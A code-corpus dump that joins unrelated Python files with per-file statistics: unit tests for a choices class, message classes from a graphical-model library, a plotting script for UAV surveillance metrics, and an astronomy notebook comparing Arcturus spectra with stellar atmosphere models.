self.assertEqual(len(self.choices), 5)
def test_iter_list(self):
self.assertEquals(sorted(list(self.choices)), sorted([(-1, 'CANCELED'), (-2, 'ERROR'),
(3, 'INVOICED'), (1, 'NEW'), (2, 'WAIT')]), self.choices)
def test_repr_choice(self):
self.assertEqual(str(sorted(self.choices)),
str(sorted([(-1, 'CANCELED'), (-2, 'ERROR'),
(3, 'INVOICED'), (1, 'NEW'), (2, 'WAIT')])), self.choices)
def test_get_value(self):
self.assertEqual(self.choices.get_value(1), 'NEW')
def test_rules_transaction_return_ok(self):
self.assertEqual(self.choices.validate(self.choices.NEW, self.choices.WAIT), 2)
def test_rules_transaction_return_false(self):
self.assertEqual(self.choices.validate(self.choices.INVOICED, self.choices.WAIT), False)
| 34.178218
| 108
| 0.627752
| 414
| 3,452
| 5.118357
| 0.13285
| 0.186881
| 0.143464
| 0.196319
| 0.833412
| 0.833412
| 0.804153
| 0.804153
| 0.804153
| 0.804153
| 0
| 0.018734
| 0.226825
| 3,452
| 100
| 109
| 34.52
| 0.775197
| 0.028679
| 0
| 0.542857
| 0
| 0
| 0.074671
| 0
| 0
| 0
| 0
| 0
| 0.314286
| 1
| 0.228571
| false
| 0
| 0.028571
| 0
| 0.557143
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 9
|
2964404202ad1b20724cf8e04663b78fcf5c7a84
| 3,528
|
py
|
Python
|
gmid2/basics/message.py
|
junkyul/gmid2-public
|
363472b8b69212dd6a9dac61d3e5d23936a5a6d2
|
[
"MIT"
] | null | null | null |
gmid2/basics/message.py
|
junkyul/gmid2-public
|
363472b8b69212dd6a9dac61d3e5d23936a5a6d2
|
[
"MIT"
] | null | null | null |
gmid2/basics/message.py
|
junkyul/gmid2-public
|
363472b8b69212dd6a9dac61d3e5d23936a5a6d2
|
[
"MIT"
] | 1
|
2020-12-28T20:06:37.000Z
|
2020-12-28T20:06:37.000Z
|
# from __future__ import annotations
from typing import Iterable
from sortedcontainers import SortedSet, SortedDict
from gmid2.basics.factor import Variable, Factor
class Message:
"""
Message is a composite of factors created from one cluster and send to another cluster
"""
mid = 0
def __init__(self, src: int=None, dest: int=None):
self.mid = Message.mid
Message.mid += 1
self.src = src
self.dest = dest
@classmethod
def reset_mid(cls):
cls.mid = 0
def __hash__(self):
return hash(self.mid)
def __str__(self):
return type(self).__name__ + self.str_post_fix()
def str_post_fix(self):
return "_{}:[{}, {}]".format(self.mid, self.src, self.dest)
class PolicyConstraint(Message): # used for submodel graph decomposition
def __init__(self, *args, **kwargs):
# def __init__(self, src:int=None, dest: int=None):
super().__init__(*args, **kwargs)
def __str__(self):
return type(self).__name__ + self.str_post_fix()
class ScopedMessage(Message):
def __init__(self, scope_vids: Iterable[int], *args, **kwargs):
self.scope_vids = SortedSet(scope_vids)
super().__init__(*args, **kwargs)
def __str__(self):
return type(self).__name__ + self.str_post_fix() + "[v:[{}]]".format(",".join(str(el) for el in self.scope_vids))
def merge_scope(self, other):
self.scope_vids.update(other.scope_vids)
class TransitionConstraint(ScopedMessage):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
def __str__(self):
return type(self).__name__ + self.str_post_fix() + "[v:[{}]]".format(",".join(str(el) for el in self.scope_vids))
# class TransitionConstraint(Message):
# def __init__(self, scope_vids: Iterable[int], *args, **kwargs):
# # def __init__(self, scope_vids: Iterable[int], src: int = None, dest: int = None):
# self.scope_vids = SortedSet(scope_vids)
# super().__init__(*args, **kwargs)
#
# def __str__(self):
# return type(self).__name__ + self.str_post_fix() + "[v:[{}]]".format(",".join(str(el) for el in self.scope_vids))
class Separator(ScopedMessage):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
def __str__(self):
return type(self).__name__ + self.str_post_fix() + "[v:[{}]]".format(",".join(str(el) for el in self.scope_vids))
# class Separator(Message):
# def __init__(self, scope_vids: Iterable[int], *args, **kwargs):
# self.scope_vids = SortedSet(scope_vids)
# super().__init__(*args, **kwargs)
#
# def __str__(self):
# return type(self).__name__ + self.str_post_fix() + "[v:[{}]]".format(",".join(str(el) for el in self.scope_vids))
class ConsistencyConstraint(ScopedMessage):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
def __str__(self):
return type(self).__name__ + self.str_post_fix() + "[v:[{}]]".format(",".join(str(el) for el in self.scope_vids))
# class ConsistencyConstraint(Message):
# def __init__(self, scope_vids: Iterable[int], *args, **kwargs):
# # def __init__(self, scope_vids: Iterable[int], src: int=None, dest: int = None):
# self.scope_vids = SortedSet(scope_vids)
# super().__init__(*args, **kwargs)
#
# def __str__(self):
# return type(self).__name__ + self.str_post_fix() + "[v:[{}]]".format(",".join(str(el) for el in self.scope_vids))
| 33.923077
| 124
| 0.636338
| 453
| 3,528
| 4.501104
| 0.154525
| 0.10152
| 0.114762
| 0.070623
| 0.724865
| 0.714566
| 0.714566
| 0.712604
| 0.712604
| 0.681216
| 0
| 0.001419
| 0.200964
| 3,528
| 103
| 125
| 34.252427
| 0.721887
| 0.394841
| 0
| 0.446809
| 0
| 0
| 0.022967
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.340426
| false
| 0
| 0.06383
| 0.170213
| 0.723404
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 8
|
462852bd39986489bb1bb4177459412453ddf6a5
| 11,537
|
py
|
Python
|
python/old/2017 early/old.05/analysis - v1.py
|
brunoolivieri/surveillanceStrategies
|
8f03b836c9e75e8612213501d6d410ebf3952341
|
[
"BSD-3-Clause"
] | 1
|
2019-06-14T21:37:56.000Z
|
2019-06-14T21:37:56.000Z
|
python/old/2017 early/old.05/analysis - v1.py
|
brunoolivieri/surveillanceStrategies
|
8f03b836c9e75e8612213501d6d410ebf3952341
|
[
"BSD-3-Clause"
] | null | null | null |
python/old/2017 early/old.05/analysis - v1.py
|
brunoolivieri/surveillanceStrategies
|
8f03b836c9e75e8612213501d6d410ebf3952341
|
[
"BSD-3-Clause"
] | null | null | null |
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import matplotlib
matplotlib.style.use('ggplot')
fileIn="cleanDataFile-2code.txt"
#to use with Jupyter. Remove when using bash
#%matplotlib inline
#plot sample
#df_file.loc[df_file['nPOIs'] == 20].boxplot('globalAvgDelay',['nPOIs','Strategy'],sym='') #tá fazendo groupBy pelos colchetes.
# reading data | ugly unstack method with a file... but !?!??
df_file = pd.read_csv(fileIn,sep=';', index_col =["Strategy", "nUAV", "nPOIs"] )
df_file.groupby(level=["Strategy","nUAV","nPOIs"]).mean().to_csv("_tmp_.txt", sep=';', encoding='utf-8')
df_data_MEAN = pd.read_csv("_tmp_.txt",sep=';', encoding='utf-8' )
# data MEAN to plot
df_data_MEAN_sparse = df_data_MEAN.loc[df_data_MEAN['nPOIs'] == 20]
df_data_MEAN_dense = df_data_MEAN.loc[df_data_MEAN['nPOIs'] == 200]
df_file_raw = pd.read_csv(fileIn,sep=';', index_col =["Strategy", "mapName", "nPOIs"] )
df_file_raw.groupby(level=["Strategy","mapName","nPOIs"]).mean().to_csv("_tmp2_.txt", sep=';', encoding='utf-8')
df_data_RAW = pd.read_csv("_tmp2_.txt",sep=';', encoding='utf-8' )
## data RAW to plot
df_data_RAW_sparse = df_data_RAW.loc[df_data_RAW['nPOIs'] == 20]
df_data_RAW_dense = df_data_RAW.loc[df_data_RAW['nPOIs'] == 200]
#markers=['s-','o-','^-']
markers=['s-', 'o--', '^-.', '^:']
##########################################################################################################################
print('Files imported...')
# SucessTax plots #####################################################################
#### Sparse
fig, ax = plt.subplots()
labels = []
i=0
for key, grp in df_data_MEAN_sparse.groupby('Strategy'):
ax = grp.plot(ax=ax, kind='line', x='nUAV', y='SucessTax', style=markers[i])
ax.set_xlim(1, 17);
labels.append(key)
i+=1
lines, _ = ax.get_legend_handles_labels()
ax.set(xlabel="Número de UAVs", ylabel="Taxa de Recuperação de Dados")
ax.legend(lines, labels, loc='best')
plt.title('TD_t - ESPARÇO')
plt.savefig('_SucessTax_Sparse.png', dpi=100)
#### Dense
fig, ax = plt.subplots()
labels = []
i=0
for key, grp in df_data_MEAN_dense.groupby('Strategy'):
ax = grp.plot(ax=ax, kind='line', x='nUAV', y='SucessTax',style=markers[i])
ax.set_xlim(1, 17);
labels.append(key)
i+=1
lines, _ = ax.get_legend_handles_labels()
ax.set(xlabel="Número de UAVs", ylabel="Taxa de Recuperação de Dados")
ax.legend(lines, labels, loc='best')
plt.title('TD_t - DENSO')
plt.savefig('_SucessTax_Dense.png', dpi=100)
########################################################################################
# throughput plots #####################################################################
#### Sparse
fig, ax = plt.subplots()
labels = []
i=0
for key, grp in df_data_MEAN_sparse.groupby('Strategy'):
ax = grp.plot(ax=ax, kind='line', x='nUAV', y='throughput',style=markers[i])
ax.set_xlim(1, 17);
labels.append(key)
i+=1
lines, _ = ax.get_legend_handles_labels()
ax.set(xlabel="Número de UAVs", ylabel="throughput")
ax.legend(lines, labels, loc='best')
plt.title('throughput - ESPARÇO')
plt.savefig('_throughput_Sparse.png', dpi=100)
#### Dense
fig, ax = plt.subplots()
labels = []
i=0
for key, grp in df_data_MEAN_dense.groupby('Strategy'):
ax = grp.plot(ax=ax, kind='line', x='nUAV', y='throughput',style=markers[i])
ax.set_xlim(1, 17);
labels.append(key)
i+=1
lines, _ = ax.get_legend_handles_labels()
ax.set(xlabel="Número de UAVs", ylabel="throughput")
ax.legend(lines, labels, loc='best')
plt.title('throughput - DENSO')
plt.savefig('_throughput_Dense.png', dpi=100)
########################################################################################
# globalAvgDelay plots #####################################################################
#### Sparse
fig, ax = plt.subplots()
labels = []
i=0
for key, grp in df_data_MEAN_sparse.groupby('Strategy'):
ax = grp.plot(ax=ax, kind='line', x='nUAV', y='globalAvgDelay',style=markers[i])
ax.set_xlim(1, 17);
labels.append(key)
i+=1
lines, _ = ax.get_legend_handles_labels()
ax.set(xlabel="Número de UAVs", ylabel="globalAvgDelay")
ax.legend(lines, labels, loc='best')
plt.title('globalAvgDelay - ESPARÇO')
plt.savefig('_globalAvgDelay_Sparse.png', dpi=100)
#### Dense
fig, ax = plt.subplots()
labels = []
i=0
for key, grp in df_data_MEAN_dense.groupby('Strategy'):
ax = grp.plot(ax=ax, kind='line', x='nUAV', y='globalAvgDelay',style=markers[i])
ax.set_xlim(1, 17);
labels.append(key)
i+=1
lines, _ = ax.get_legend_handles_labels()
ax.set(xlabel="Número de UAVs", ylabel="globalAvgDelay")
ax.legend(lines, labels, loc='best')
plt.title('globalAvgDelay - DENSO')
plt.savefig('_globalAvgDelay_Dense.png', dpi=100)
########################################################################################
# maxData/starvation plots #####################################################################
#### Sparse
fig, ax = plt.subplots()
labels = []
i=0
for key, grp in df_data_MEAN_sparse.groupby('Strategy'):
ax = grp.plot(ax=ax, kind='line', x='nUAV', y='maxData',style=markers[i])
ax.set_xlim(1, 17);
labels.append(key)
i+=1
lines, _ = ax.get_legend_handles_labels()
ax.set(xlabel="Número de UAVs", ylabel="maxData")
ax.legend(lines, labels, loc='best')
plt.title('maxData - ESPARÇO')
plt.savefig('_maxData_Sparse.png', dpi=100)
#### Dense
fig, ax = plt.subplots()
labels = []
i=0
for key, grp in df_data_MEAN_dense.groupby('Strategy'):
ax = grp.plot(ax=ax, kind='line', x='nUAV', y='maxData',style=markers[i])
ax.set_xlim(1, 17);
labels.append(key)
i+=1
lines, _ = ax.get_legend_handles_labels()
ax.set(xlabel="Número de UAVs", ylabel="maxData")
ax.legend(lines, labels, loc='best')
plt.title('maxData - DENSO')
plt.savefig('_maxData_Dense.png', dpi=100)
########################################################################################
# TaxPerPathSize/Efficient plots #####################################################################
#### Sparse
fig, ax = plt.subplots()
labels = []
i=0
for key, grp in df_data_MEAN_sparse.groupby('Strategy'):
ax = grp.plot(ax=ax, kind='line', x='nUAV', y='TaxPerPathSize',style=markers[i])
ax.set_xlim(1, 17);
labels.append(key)
i+=1
lines, _ = ax.get_legend_handles_labels()
ax.set(xlabel="Número de UAVs", ylabel="TaxPerPathSize")
ax.legend(lines, labels, loc='best')
plt.title('TaxPerPathSize - ESPARÇO')
plt.savefig('_TaxPerPathSize_Sparse.png', dpi=100)
#### Dense
fig, ax = plt.subplots()
labels = []
i=0
for key, grp in df_data_MEAN_dense.groupby('Strategy'):
ax = grp.plot(ax=ax, kind='line', x='nUAV', y='TaxPerPathSize',style=markers[i])
ax.set_xlim(1, 17);
labels.append(key)
i+=1
lines, _ = ax.get_legend_handles_labels()
ax.set(xlabel="Número de UAVs", ylabel="TaxPerPathSize")
ax.legend(lines, labels, loc='best')
plt.title('TaxPerPathSize - DENSO')
plt.savefig('_TaxPerPathSize_Dense.png', dpi=100)
########################################################################################
# tourSize/mapa plots #####################################################################
#### Sparse
fig, ax = plt.subplots()
labels = []
i=0
for key, grp in df_data_RAW_sparse.groupby('Strategy'):
ax = grp.plot(ax=ax, kind='line', x='mapName', y='tourSize',style=markers[i])
#ax.set_xlim(0, 101);
labels.append(key)
i+=1
lines, _ = ax.get_legend_handles_labels()
ax.set(xlabel="maps", ylabel="tourSize")
ax.legend(lines, labels, loc='best')
plt.title('tourSize - ESPARÇO')
plt.savefig('_tourSize_Sparse.png', dpi=100)
#### Dense
fig, ax = plt.subplots()
labels = []
i=0
for key, grp in df_data_RAW_sparse.groupby('Strategy'):
ax = grp.plot(ax=ax, kind='line', x='mapName', y='tourSize',style=markers[i])
#ax.set_xlim(0, 101);
labels.append(key)
i+=1
lines, _ = ax.get_legend_handles_labels()
ax.set(xlabel="maps", ylabel="tourSize")
ax.legend(lines, labels, loc='best')
plt.title('tourSize - DENSO')
plt.savefig('_tourSize_Dense.png', dpi=100)
########################################################################################
# delay/mapa plots #####################################################################
#### Sparse
fig, ax = plt.subplots()
labels = []
i=0
for key, grp in df_data_RAW_sparse.groupby('Strategy'):
ax = grp.plot(ax=ax, kind='line', x='mapName', y='globalAvgDelay',style=markers[i])
#ax.set_xlim(0, 101);
labels.append(key)
i+=1
lines, _ = ax.get_legend_handles_labels()
ax.set(xlabel="maps", ylabel="globalAvgDelay")
ax.legend(lines, labels, loc='best')
plt.title('globalAvgDelay - ESPARÇO')
plt.savefig('_tourSize_Sparse.png', dpi=100)
#### Dense
fig, ax = plt.subplots()
labels = []
i=0
for key, grp in df_data_RAW_sparse.groupby('Strategy'):
ax = grp.plot(ax=ax, kind='line', x='mapName', y='globalAvgDelay',style=markers[i])
#ax.set_xlim(0, 101);
labels.append(key)
i+=1
lines, _ = ax.get_legend_handles_labels()
ax.set(xlabel="maps", ylabel="globalAvgDelay")
ax.legend(lines, labels, loc='best')
plt.title('globalAvgDelay - DENSO')
plt.savefig('_globalAvgDelay_Dense.png', dpi=100)
########################################################################################
# tourSize/mapa plots #####################################################################
#### Sparse
fig, ax = plt.subplots()
labels = []
i=0
for key, grp in df_data_RAW_sparse.groupby('Strategy'):
ax = grp.plot(ax=ax, kind='line', x='mapName', y='tourSize',style=markers[i])
#ax.set_xlim(0, 101);
labels.append(key)
i+=1
lines, _ = ax.get_legend_handles_labels()
ax.set(xlabel="maps", ylabel="tourSize")
ax.legend(lines, labels, loc='best')
plt.title('tourSize - ESPARÇO')
plt.savefig('_tourSize_Sparse.png', dpi=100)
#### Dense
fig, ax = plt.subplots()
labels = []
i=0
for key, grp in df_data_RAW_sparse.groupby('Strategy'):
ax = grp.plot(ax=ax, kind='line', x='mapName', y='tourSize',style=markers[i])
#ax.set_xlim(0, 101);
labels.append(key)
i+=1
lines, _ = ax.get_legend_handles_labels()
ax.set(xlabel="maps", ylabel="tourSize")
ax.legend(lines, labels, loc='best')
plt.title('tourSize - DENSO')
plt.savefig('_tourSize_Dense.png', dpi=100)
########################################################################################
# processingTime/mapa plots #####################################################################
#### Sparse
fig, ax = plt.subplots()
labels = []
i=0
for key, grp in df_data_RAW_sparse.groupby('Strategy'):
ax = grp.plot(ax=ax, kind='line', x='mapName', y='simumationTimeMS',style=markers[i])
#ax.set_xlim(0, 101);
labels.append(key)
i+=1
lines, _ = ax.get_legend_handles_labels()
ax.set(xlabel="maps", ylabel="simumationTimeMS")
ax.legend(lines, labels, loc='best')
plt.title('simumationTimeMS/map - ESPARÇO')
plt.savefig('_simumationTimeMS_map_Sparse.png', dpi=100)
#### Dense
fig, ax = plt.subplots()
labels = []
i=0
for key, grp in df_data_RAW_sparse.groupby('Strategy'):
ax = grp.plot(ax=ax, kind='line', x='mapName', y='simumationTimeMS',style=markers[i])
#ax.set_xlim(0, 101);
labels.append(key)
i+=1
lines, _ = ax.get_legend_handles_labels()
ax.set(xlabel="maps", ylabel="simumationTimeMS")
ax.legend(lines, labels, loc='best')
plt.title('simumationTimeMS/map - DENSO')
plt.savefig('_simumationTimeMS_map_Dense.png', dpi=100)
########################################################################################
| 27.8
| 127
| 0.589321
| 1,548
| 11,537
| 4.23708
| 0.082041
| 0.027443
| 0.021955
| 0.043909
| 0.844031
| 0.844031
| 0.842811
| 0.826041
| 0.799207
| 0.799207
| 0
| 0.016717
| 0.113374
| 11,537
| 414
| 128
| 27.86715
| 0.624499
| 0.069689
| 0
| 0.840164
| 0
| 0
| 0.217348
| 0.030453
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.020492
| 0
| 0.020492
| 0.004098
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
467cad0d2c52c1919e6c75f9096a8872071c9ce6
| 13,655
|
py
|
Python
|
Artucus with models.py
|
jason-neal/phoenix_notes
|
210891542ab942969b123755756aae957979056e
|
[
"MIT"
] | null | null | null |
Artucus with models.py
|
jason-neal/phoenix_notes
|
210891542ab942969b123755756aae957979056e
|
[
"MIT"
] | null | null | null |
Artucus with models.py
|
jason-neal/phoenix_notes
|
210891542ab942969b123755756aae957979056e
|
[
"MIT"
] | null | null | null |
# coding: utf-8
# In[1]:
from spectrum_overload import Spectrum
import glob
import os
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import string
import numpy as np
from astropy.io import fits
from astro_scripts.plot_fits import get_wavelength, ccf_astro, vac2air
from loading_phoenix import load_phoenix_aces, load_Allard_Phoenix, align2model
get_ipython().run_line_magic('matplotlib', 'inline')
# In[2]:
def align2model(spectrum, model):
rv1, r_sun, c_sun, x_sun, y_sun = ccf_astro((spectrum.xaxis, -spectrum.flux + 1), (model.xaxis, -model.flux + 1))
spectrum.doppler_shift(-rv1)
print(rv1)
return spectrum
# ./ files can also use readUnit7 from pyastronomy phoneix utils. but give result in /cm. not /Angstrom. (factor of 10**8 that comes from DF for new models)
# # Synthethic Artucus
# Using the models with Teff 4300, 1.5 logg, -0.0 [Fe/H]
#
# Daniel used -0.5 Fe/H
#
# load Allard_PHOENIX reutrns wavelenght in nanometers.
# Using vac2air to convert to air, (which needs angstroms). Hence *10 / 10 fudge
# In[3]:
w_settl, f_settl, bb_settl = load_Allard_Phoenix("data/lte043.0-2.5-0.0a+0.0.BT-Settl.spec.7")
settl_spec = Spectrum(xaxis=vac2air(w_settl*10)/10, flux=f_settl)
w_dusty_spec, f_dusty_spec, bb_dusty_spec = load_Allard_Phoenix("data/lte043-2.5-0.0.BT-Dusty.spec.7")
dusty_spec = Spectrum(xaxis=vac2air(w_dusty_spec*10)/10, flux=f_dusty_spec)
w_next, f_next, bb_next = load_Allard_Phoenix("data/lte043-2.5-0.0a+0.0.BT-NextGen.7")
next_spec = Spectrum(xaxis=vac2air(w_next*10)/10, flux=f_next)
w_cond, f_cond, bb_cond = load_Allard_Phoenix("data/lte043-2.5-0.0a+0.0.BT-Cond.7")
cond_spec = Spectrum(xaxis=vac2air(w_cond*10)/10, flux=f_cond)
w_aces, f_aces = load_phoenix_aces("data/lte04300-2.50-0.0.PHOENIX-ACES-AGSS-COND-2011-HiRes.fits")
aces_spec = Spectrum(xaxis=vac2air(w_aces*10)/10, flux=f_aces)
# In[4]:
w_aces, f_aces = load_phoenix_aces("data/lte04300-1.50-0.0.PHOENIX-ACES-AGSS-COND-2011-HiRes.fits")
aces_spec_15 = Spectrum(xaxis=vac2air(w_aces*10)/10, flux=f_aces)
(aces_spec_15 - aces_spec).plot()
plt.title("Difference between 1.5 and 2.5 logg for phoenix aces")
plt.show()
# In[5]:
# Full Spectrum
plt.figure(figsize=(15, 10))
dusty_spec.plot(label="BT-DUSTY")
settl_spec.plot(label="BT-SETTL")
cond_spec.plot(label="BT-COND")
aces_spec.plot(linestyle="--", label="PHOENIX ACES")
next_spec.plot(linestyle=":", label="NEXTGEN")
#plt.plot(w_dusty_fits, f_dusty_fits/max(f_dusty_fits), label="Dusty fits")
plt.title("Artucus - 4300K")
plt.xlabel("Wavelength(nm)")
plt.ylabel("Flux")
plt.legend()
plt.show()
# In[6]:
# COMPARISON TO PHOENIX ACES
# Full Spectrum Differences
plt.figure(figsize=(15, 15))
ax0 = plt.subplot(411)
(aces_spec - settl_spec).plot(axis=ax0)
plt.title("PHOENIX ACES - BT-Settl")
plt.ylabel("Flux")
ax1 = plt.subplot(412)
(settl_spec - cond_spec).plot(axis=ax1)
plt.title("BT-Settl- BT-Cond")
plt.ylabel("Flux")
ax2 = plt.subplot(413)
(dusty_spec - cond_spec).plot(axis=ax2)
plt.title("BT-Dusty-BT-Cond")
ax3 = plt.subplot(414)
(next_spec - cond_spec).plot(axis=ax3)
plt.title("NextGen - Cond")
plt.suptitle("Synthethic Differences\nArtucus-like\nTeff=4300, logg=2.5, Fe/H= 0.0")
plt.xlabel("Wavelength(nm)")
plt.ylabel("Flux")
plt.legend()
plt.show()
# Relative
plt.figure(figsize=(15, 15))
ax0 = plt.subplot(411)
((aces_spec - settl_spec)/aces_spec).plot(axis=ax0)
plt.title("PHOENIX ACES - BT-Settl")
plt.ylabel("Flux")
ax1 = plt.subplot(412)
(settl_spec - cond_spec).plot(axis=ax1)
plt.title("BT-Settl- BT-Cond")
plt.ylabel("Flux")
ax2 = plt.subplot(413)
(dusty_spec - cond_spec).plot(axis=ax2)
plt.title("BT-Dusty-BT-Cond")
ax3 = plt.subplot(414)
(next_spec - cond_spec).plot(axis=ax3)
plt.title("NextGen - Cond")
plt.suptitle("Synthethic Differences\nArtucus-like\nTeff=4300, logg=2.5, Fe/H= 0.0")
plt.xlabel("Wavelength(nm)")
plt.ylabel("Flux")
plt.legend()
plt.show()
# In[7]:
[1000, 3000]
# COMPARISON TO BT-SETTLE models
# Full Spectrum Differences
plt.figure(figsize=(15, 15))
ax0 = plt.subplot(411)
(settl_spec - next_spec).plot(axis=ax0)
plt.title("BT-Settl, BT-NextGen")
plt.ylabel("Flux")
ax1 = plt.subplot(412)
(settl_spec - cond_spec).plot(axis=ax1)
plt.title("BT-Settl- BT-Cond")
plt.ylabel("Flux")
ax2 = plt.subplot(413)
(settl_spec - dusty_spec).plot(axis=ax2)
plt.title("BT-Settl - BT-Dusty")
ax3 = plt.subplot(414)
(cond_spec - dusty_spec).plot(axis=ax3)
plt.title("BT-Cond - BT-Dusty")
ax4 = plt.subplot(414)
(next_spec - cond_spec).plot(axis=ax4)
plt.title("BT-NextGen - Cond")
plt.suptitle("BT-XXX Synthethic Differences\nArtucus-like\nTeff=4300, logg=2.5, Fe/H= 0.0")
plt.xlabel("Wavelength(nm)")
plt.ylabel("Flux")
plt.legend()
plt.show()
# Relative
plt.figure(figsize=(15, 15))
ax10 = plt.subplot(411)
((settl_spec - next_spec)/settl_spec).plot(axis=ax10)
plt.title("BT-Settl, BT-NextGen")
plt.ylabel("Flux")
ax11 = plt.subplot(412)
((settl_spec - cond_spec)/settl_spec).plot(axis=ax11)
plt.title("BT-Settl- BT-Cond")
plt.ylabel("Flux")
ax12 = plt.subplot(413)
((settl_spec - dusty_spec)/settl_spec).plot(axis=ax12)
plt.title("BT-Settl - BT-Dusty")
ax13 = plt.subplot(414)
((cond_spec - dusty_spec)/cond_spec).plot(axis=ax13)
plt.title("BT-Cond - BT-Dusty")
ax14 = plt.subplot(414, sharex=ax10)
((next_spec - cond_spec)/next_spec).plot(axis=ax14)
plt.title("BT-NextGen - Cond")
plt.suptitle("BT-XXX Relative Synthethic Differences\nArtucus-like\nTeff=4300, logg=2.5, Fe/H= 0.0")
plt.xlabel("Wavelength(nm)")
plt.ylabel("Flux")
plt.legend()
plt.show()
# In[8]:
# ARTUCUS 1000nm
artucus_1 = "/home/jneal/Phd/data/artucus/10097-10155_s-obs.fits"
data, hdr = fits.getdata(artucus_1, header=True)
artucus_1 = Spectrum(xaxis=get_wavelength(hdr)/10, flux=data, header=hdr )
artucus_1 = artucus_1.normalize("linear")
# In[9]:
#limits = [2100, 2200]
limits = [artucus_1.xaxis[0]-2, artucus_1.xaxis[-1]+2]
print(limits)
next_spec.wav_select(*limits)
next_spec = next_spec.normalize("exponential")
dusty_spec.wav_select(*limits)
dusty_spec = dusty_spec.normalize("exponential")
settl_spec.wav_select(*limits)
settl_spec = settl_spec.normalize("exponential")
cond_spec.wav_select(*limits)
cond_spec = cond_spec.normalize("exponential")
aces_spec.wav_select(*limits)
aces_spec = aces_spec.normalize("exponential")
# In[10]:
print(np.mean(vac2air(aces_spec.xaxis*10)/10 - aces_spec.xaxis)*3e5)
artucus_1 = align2model(artucus_1, aces_spec)
# In[11]:
plt.figure(figsize=(15, 10))
artucus_1.plot(label="Artucus")
dusty_spec.plot(label="BT-DUSTY")
settl_spec.plot(label="BT-SETTL")
cond_spec.plot(label="BT-COND")
aces_spec.plot(linestyle="--", label="PHOENIX ACES")
next_spec.plot(linestyle=":", label="NEXTGEN")
#plt.plot(w_dusty_fits, f_dusty_fits/max(f_dusty_fits), label="Dusty fits")
plt.title("Artucus - 4300K")
plt.xlabel("Wavelength(nm)")
plt.ylabel("Flux")
plt.legend()
plt.show()
# In[12]:
plt.figure(figsize=(15, 10))
artucus_1.plot(label="Artucus")
dusty_spec.plot(label="BT-DUSTY")
settl_spec.plot(label="BT-SETTL")
cond_spec.plot(label="BT-COND")
aces_spec.plot(linestyle="--", label="PHOENIX ACES")
next_spec.plot(linestyle=":", label="NEXTGEN")
#plt.plot(w_dusty_fits, f_dusty_fits/max(f_dusty_fits), label="Dusty fits")
plt.title("Artucus - 4300K")
plt.xlabel("Wavelength(nm)")
plt.ylabel("Flux")
plt.xlim([1014.25, 1015])
plt.legend()
plt.show()
# In[13]:
plt.figure(figsize=(15, 10))
artucus_1.plot(label="Artucus")
dusty_spec.plot(label="BT-DUSTY")
settl_spec.plot(label="BT-SETTL")
cond_spec.plot(label="BT-COND")
aces_spec.plot(linestyle="--", label="PHOENIX ACES")
next_spec.plot(linestyle=":", label="NEXTGEN")
#plt.plot(w_dusty_fits, f_dusty_fits/max(f_dusty_fits), label="Dusty fits")
plt.title("Artucus - 4300K")
plt.xlabel("Wavelength(nm)")
plt.ylabel("Flux")
plt.xlim([1012, 1013])
plt.legend()
plt.show()
# In[14]:
# Adjust resolution to R=100000
R = 100000
from convolve_spectrum import convolve_spectrum
old_spec = aces_spec.copy()
next_spec = convolve_spectrum(next_spec, chip_limits=[next_spec.xaxis[0], next_spec.xaxis[-1]], R=R, plot=False)
dusty_spec = convolve_spectrum(dusty_spec, chip_limits=[dusty_spec.xaxis[0], dusty_spec.xaxis[-1]], R=R, plot=False)
settl_spec = convolve_spectrum(settl_spec, chip_limits=[settl_spec.xaxis[0], settl_spec.xaxis[-1]], R=R, plot=False)
cond_spec = convolve_spectrum(cond_spec, chip_limits=[cond_spec.xaxis[0], cond_spec.xaxis[-1]], R=R, plot=False)
aces_spec = convolve_spectrum(aces_spec, chip_limits=[aces_spec.xaxis[0], aces_spec.xaxis[-1]], R=R, plot=False)
assert aces_spec != old_spec
# In[15]:
plt.figure(figsize=(15, 10))
artucus_1.plot(label="Artucus")
dusty_spec.plot(label="BT-DUSTY")
settl_spec.plot(label="BT-SETTL")
cond_spec.plot(label="BT-COND")
aces_spec.plot(linestyle="--", label="PHOENIX ACES")
next_spec.plot(linestyle=":", label="NEXTGEN")
#plt.plot(w_dusty_fits, f_dusty_fits/max(f_dusty_fits), label="Dusty fits")
plt.title("Artucus - 4300K")
plt.xlabel("Wavelength(nm)")
plt.ylabel("Flux")
plt.legend()
plt.show()
# In[16]:
plt.figure(figsize=(15, 10))
artucus_1.plot(label="Artucus")
dusty_spec.plot(label="BT-DUSTY")
settl_spec.plot(label="BT-SETTL")
cond_spec.plot(label="BT-COND")
aces_spec.plot(linestyle="--", label="PHOENIX ACES")
next_spec.plot(linestyle=":", label="NEXTGEN")
#plt.plot(w_dusty_fits, f_dusty_fits/max(f_dusty_fits), label="Dusty fits")
plt.title("Artucus - 4300K")
plt.xlabel("Wavelength(nm)")
plt.ylabel("Flux")
plt.xlim([1014, 1016])
plt.legend()
plt.show()
# # Artucus 2000nm
# In[17]:
artucus_2 = "/home/jneal/Phd/data/artucus/21380-21518_s-obs.fits"
data, hdr = fits.getdata(artucus_2, header=True)
artucus_2 = Spectrum(xaxis=get_wavelength(hdr)/10, flux=data, header=hdr)
# In[18]:
